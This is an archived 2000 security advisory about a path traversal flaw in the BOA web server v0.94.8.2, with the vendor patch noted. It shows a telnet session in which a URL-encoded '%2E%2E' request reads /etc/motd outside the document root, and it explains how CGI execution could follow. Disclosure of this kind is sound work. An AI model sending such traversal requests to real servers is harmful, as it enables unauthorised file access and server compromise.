
boa.server.txt

Date: 10 Oct 2000 | Reported by: Lluis Mora | Type: packetstorm | Source: packetstormsecurity.com

Vulnerability in BOA web server v0.94.8.2 allows arbitrary file access on Unix platforms.

Code
`###############################################################  
ID: S21SEC-005-en  
Title: Vulnerability in BOA web server v0.94.8.2  
Date: 03/10/2000  
Status: Vendor contacted, patch available  
Scope: Arbitrary file access  
Platforms: Unix  
Author: llmora  
Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt  
Release: Public  
###############################################################  
  
S 2 1 S E C  
  
http://www.s21sec.com  
  
Vulnerability in BOA web server v0.94.8.2  
  
  
There is a security bug in BOA v0.94.8.2 that allows a malicious  
user to access files outside the document root of the web server  
as the user the server runs as.  
  
About BOA  
---------  
  
Boa is an open source high performance web server for Unix-alike  
computers (http://www.boa.org). It does file serving and dynamic  
content generation via CGI.  
  
Vulnerability description  
-------------------------  
  
- Reading any file in the web server  
  
The boa web server suffers from the well-known "../.." web server  
problem. If we request a document from the web server,  
using the "../.." technique, we get:  
  
homer:~$ telnet ilf 80  
Escape character is '^]'.  
GET /../../../../../../../../../../../etc/motd HTTP/1.0  
  
HTTP/1.0 404 Not Found  
  
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>  
<BODY><H1>404 Not Found</H1>  
The requested URL /etc/motd was not found on this server.  
</BODY></HTML>  
Connection closed by foreign host.  
homer:~$  
  
So apparently it doesn't work, as boa checks for "/.." in the path.  
  
By URL-encoding the "." in the request, we are able to skip the ".." test,  
allowing us to access the contents of any file the user running the  
web server has access to:  
  
homer:~$ telnet ilf 80  
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd HTTP/1.0  
  
HTTP/1.0 200 OK  
  
[... the /etc/motd file content is shown]  
  
Connection closed by foreign host.  
homer:~$  
  
If the administrator enables extension based CGI support with a line like  
this in the boa.conf file:  
  
AddType application/x-httpd-cgi cgi  
  
then a request for a file ending in .cgi will result in the file being  
executed with the privileges of the user id running the web server. This  
file can be placed in any folder throughout the file system, not strictly  
under the DocumentRoot, and be accessed using the previous bug, leading  
to the web server account compromise.  
  
Affected versions  
-----------------  
  
This bug has been tested and verified to be present in v0.94.8.2 of the boa  
web server. Version 0.92 of boa is not affected by this problem.  
  
Fix information  
---------------  
  
The boa development team has released v0.94.8.3 which fixes this  
vulnerability.  
Upgrades are available at the vendor website (http://www.boa.org).  
  
S21SEC wishes to thank the boa development team for acknowledging the issue  
and releasing a security patch in a matter of hours.  
  
Additional information  
----------------------  
  
This vulnerability was found and researched by:  
  
Lluis Mora [email protected]  
  
You can find the latest version of this advisory at:  
  
http://www.s21sec.com/en/avisos/s21sec-005-en.txt  
  
And other S21SEC advisories at http://www.s21sec.com/en/avisos/  
  
`
